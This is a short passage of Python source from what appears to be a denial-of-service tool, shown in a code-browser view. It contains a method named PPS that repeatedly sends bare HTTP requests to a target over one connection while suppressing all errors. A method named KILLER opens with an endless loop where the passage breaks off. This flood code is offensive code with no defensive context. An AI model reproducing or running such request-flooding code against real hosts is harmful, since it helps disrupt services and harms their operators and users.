(self)
| 1046 | Tools.safe_close(s) |
| 1047 | |
| 1048 | def PPS(self) -> None: |
| 1049 | payload: Any = str.encode(self._defaultpayload + |
| 1050 | f"Host: {self._target.authority}\r\n\r\n") |
| 1051 | s = None |
| 1052 | with suppress(Exception), self.open_connection() as s: |
| 1053 | for _ in range(self._rpc): |
| 1054 | Tools.send(s, payload) |
| 1055 | Tools.safe_close(s) |
| 1056 | |
| 1057 | def KILLER(self) -> None: |
| 1058 | while True: |
nothing calls this directly
no test coverage detected